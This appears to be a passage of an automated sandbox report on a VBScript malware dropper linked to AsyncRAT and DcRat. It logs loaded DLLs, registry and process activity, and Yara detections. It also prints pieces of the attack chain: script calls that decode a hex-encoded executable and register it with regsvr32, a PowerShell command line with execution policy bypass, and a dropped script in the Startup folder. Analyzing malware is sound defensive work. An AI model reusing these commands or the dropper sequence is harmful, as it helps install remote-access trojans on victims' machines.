        Source: C:\Windows\winhlp32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winmm.dll
        Source: C:\Windows\winhlp32.exeSection loaded: urlmon.dll
        Source: C:\Windows\winhlp32.exeSection loaded: wininet.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iertutil.dll
        Source: C:\Windows\winhlp32.exeSection loaded: srvcli.dll
        Source: C:\Windows\winhlp32.exeSection loaded: netutils.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: rstrtmgr.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ncrypt.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ntasn1.dll
        Source: C:\Windows\winhlp32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winmm.dll
        Source: C:\Windows\winhlp32.exeSection loaded: urlmon.dll
        Source: C:\Windows\winhlp32.exeSection loaded: wininet.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iertutil.dll
        Source: C:\Windows\winhlp32.exeSection loaded: srvcli.dll
        Source: C:\Windows\winhlp32.exeSection loaded: netutils.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: rstrtmgr.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ncrypt.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ntasn1.dll
        Source: C:\Windows\winhlp32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: zipfldr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: zipfldr.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.fileexplorer.common.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winmm.dll
        Source: C:\Windows\winhlp32.exeSection loaded: urlmon.dll
        Source: C:\Windows\winhlp32.exeSection loaded: wininet.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iertutil.dll
        Source: C:\Windows\winhlp32.exeSection loaded: srvcli.dll
        Source: C:\Windows\winhlp32.exeSection loaded: netutils.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: rstrtmgr.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ncrypt.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ntasn1.dll
        Source: C:\Windows\winhlp32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
        Source: C:\Windows\winhlp32.exeSection loaded: winmm.dll
        Source: C:\Windows\winhlp32.exeSection loaded: urlmon.dll
        Source: C:\Windows\winhlp32.exeSection loaded: wininet.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iertutil.dll
        Source: C:\Windows\winhlp32.exeSection loaded: srvcli.dll
        Source: C:\Windows\winhlp32.exeSection loaded: netutils.dll
        Source: C:\Windows\winhlp32.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\winhlp32.exeSection loaded: rstrtmgr.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ncrypt.dll
        Source: C:\Windows\winhlp32.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: Binary string: C:\Users\28718\Documents\GitHub\DcRat\Binaries\Release\Plugins\SendFile.pdb source: RegAsm.exe, 00000004.00000002.3319084811.0000000005F20000.00000004.08000000.00040000.00000000.sdmp

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%windir%");IHost.CreateObject("wscript.shell");ISWbemServicesEx.ExecQuery("SELECT * FROM WIN32_COMPUTERSYSTEM");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IHost.Path();IWshShell3.ExpandEnvironmentStrings("%WINDIR%");IHost.ScriptFullName();IWshShell3.Run("C:\Windows\SYSWOW64\WSCRIPT.EXE //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"")
        Source: C:\Windows\SysWOW64\wscript.exeAnti Malware Scan Interface: CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%windir%");IHost.CreateObject("wscript.shell");ISWbemServicesEx.ExecQuery("SELECT * FROM WIN32_COMPUTERSYSTEM");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IHost.Path();IWshShell3.ExpandEnvironmentStrings("%temp%");IXMLDOMNode._0000003f("<HELLO/>");IXMLDOMNode._00000028();IXMLDOMElement.nodeTypedValue("4D5A6C000100000002000000FFFF00000000000011000000400000000000000057696E33322050726F6772616D210D0A24B409BA0001CD21B44CCD2160000000476F4C696E6B2C20476F41736D207777772E476F446576546F6F6C2E636F6D00504500004C0107003575F8480");IXMLDOMNode._00000028();IXMLDOMElement.dataType("BIN.HEX");IXMLDOMNode._00000028();IXMLDOMElement.nodeTypedValue();IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\dynwrapx.dll");_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\dynwrapx.dll");IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%windir%");IHost.CreateObject("wscript.shell");ISWbemServicesEx.ExecQuery("SELECT * FROM WIN32_COMPUTERSYSTEM");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IHost.Path();IWshShell3.ExpandEnvironmentStrings("%temp%");IXMLDOMNode._0000003f("<HELLO/>");IXMLDOMNode._00000028();IXMLDOMElement.nodeTypedValue("4D5A6C000100000002000000FFFF00000000000011000000400000000000000057696E33322050726F6772616D210D0A24B409BA0001CD21B44CCD2160000000476F4C696E6B2C20476F41736D207777772E476F446576546F6F6C2E636F6D00504500004C0107003575F8480");IXMLDOMNode._00000028();IXMLDOMElement.dataType("BIN.HEX");IXMLDOMNode._00000028();IXMLDOMElement.nodeTypedValue();IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\dynwrapx.dll");_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\dynwrapx.dll");IWshShell3.Run("regsvr32.exe /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"", "0", "true");IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%windir%");IHost.CreateObject("wscript.shell");ISWbemServicesEx.ExecQuery("SELECT * FROM WIN32_COMPUTERSYSTEM");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IHost.Path();IWshShell3.ExpandEnvironmentStrings("%temp%");IXMLDOMNode._0000003f("<HELLO/>");IXMLDOMNode._00000028();IXMLDOMElement.nodeTypedValue("4D5A6C000100000002000000FFFF00000000000011000000400000000000000057696E33322050726F6772616D210D0A24B409BA0001CD21B44CCD2160000000476F4C696E6B2C20476F41736D207777772E476F446576546F6F6C2E636F6D00504500004C0107003575F8480");IXMLDOMNode._00000028();IXMLDOMElement.dataType("BIN.HEX");IXMLDOMNode._00000028();IXMLDOMElement.nodeTypedValue();IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\dynwrapx.dll");_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\dynwrapx.dll");IWshShell3.Run("regsvr32.exe /I /S "C:\Users\al
        Suspicious powershell command line found
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CB50
        Source: dynwrapx.dll.2.drStatic PE information: section name: const
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DC1 pushad ; iretd 2_3_051A9DC2
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA
        Source: C:\Windows\SysWOW64\wscript.exeCode function: 2_3_051A9DD9 pushad ; retf 0057h2_3_051A9DDA

        Persistence and Installation Behavior

        barindex
        Windows Shell Script Host drops VBS files
        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00406EB0 ShellExecuteW,URLDownloadToFileW,17_2_00406EB0
        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\dynwrapx.dllJump to dropped file

        Boot Survival

        barindex
        Yara detected AsyncRAT
        Source: Yara matchFile source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5144, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR
        Drops VBS files to the startup folder
        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbsJump to dropped file
        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs
        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AA4A
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CB50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\6FA57DE146646C132F6E 54A25BAFF557DB5C79E3CC342368ADFCFD9AB2EA9908343A4F6A6267258007D1Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
